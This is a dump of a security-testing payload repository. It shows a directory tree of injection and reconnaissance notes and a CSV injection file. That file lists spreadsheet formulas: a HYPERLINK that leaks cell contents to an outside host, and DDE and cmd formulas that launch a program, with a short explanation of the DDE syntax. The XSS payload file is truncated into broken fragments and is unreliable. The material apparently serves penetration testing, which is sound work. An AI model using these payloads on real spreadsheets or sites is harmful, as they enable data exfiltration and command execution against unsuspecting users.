├── ASS ├── OWASP_Application_Security_Verification_Standard_3.0.1.pdf └── README.md ├── CSVInjection └── CSVInjection.md ├── CrossSiteScripting-XSS ├── AdvancedPayload.txt ├── XSS.md └── xss-2016.txt ├── DirectoryTriversal └── DirectoryTriversal.md ├── HowTo.md ├── HowtoTestMaliciousFileUpload.md ├── InformationFuzzer.md ├── InformationGathering ├── AngryFuzzer.md ├── Dracnmap.md ├── NMap.md ├── NetZapper.md ├── ReconDog.md ├── Sublist3r.md ├── ToolsForInformationGathering.md └── YukiChan.md ├── Kali Linux └── UpgradeKaliLinux.md ├── LDAPInjection ├── Intruders └── LdapInjection.md ├── NoSQLInjection └── NoSQLInjection.md ├── README.md ├── SQLInjection ├── Intruders │ ├── Auth_Bypass.txt │ └── ByPass_Auth_lv2.txt ├── PostgresSQL.md ├── SQLInjection.md └── SQLiteInjection.md ├── SQLMap.md ├── VulnerabilitiesScanners.md ├── icon.png └── sql injection.png /ASS/OWASP_Application_Security_Verification_Standard_3.0.1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/josdoaitran/payload-for-security-testing/d6c38ee272f97fe234ccb2f287310d42d3d1a6b1/ASS/OWASP_Application_Security_Verification_Standard_3.0.1.pdf -------------------------------------------------------------------------------- /ASS/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /CSVInjection/CSVInjection.md: -------------------------------------------------------------------------------- 1 | # CSV_Injection 2 | 3 | ## Payload 4 | ``` 5 | =HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information") 6 | =DDE(server; file; item; mode) 7 | =DDE("cmd";"/C calc";"__DdeLink_60_870516294") 8 | =cmd|' /C calc'!A0 9 | 10 | DDE ("cmd";"/C calc";"!A0")A0 11 | @SUM(1+1)*cmd|' /C calc'!A0 12 | 13 | Technical Details of the above payload: 14 | cmd is the name the server can respond to whenever a client is trying to access the server 15 | /C calc is the file name which in our case is the calc(i.e the calc.exe) 16 | !A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data 17 | ``` 18 | Any formula can be started with 19 | ``` 20 | = 21 | + 22 | – 23 | @ 24 | ``` 25 | ## Reference: 26 | * https://www.owasp.org/index.php/CSV_Injection 27 | -------------------------------------------------------------------------------- /CrossSiteScripting-XSS/AdvancedPayload.txt: -------------------------------------------------------------------------------- 1 | "> 2 | "> 3 | "> 4 | "> 5 | ">

Clickme

7 | ">Clickme 8 | ">Clickme 9 | ">click 10 | ">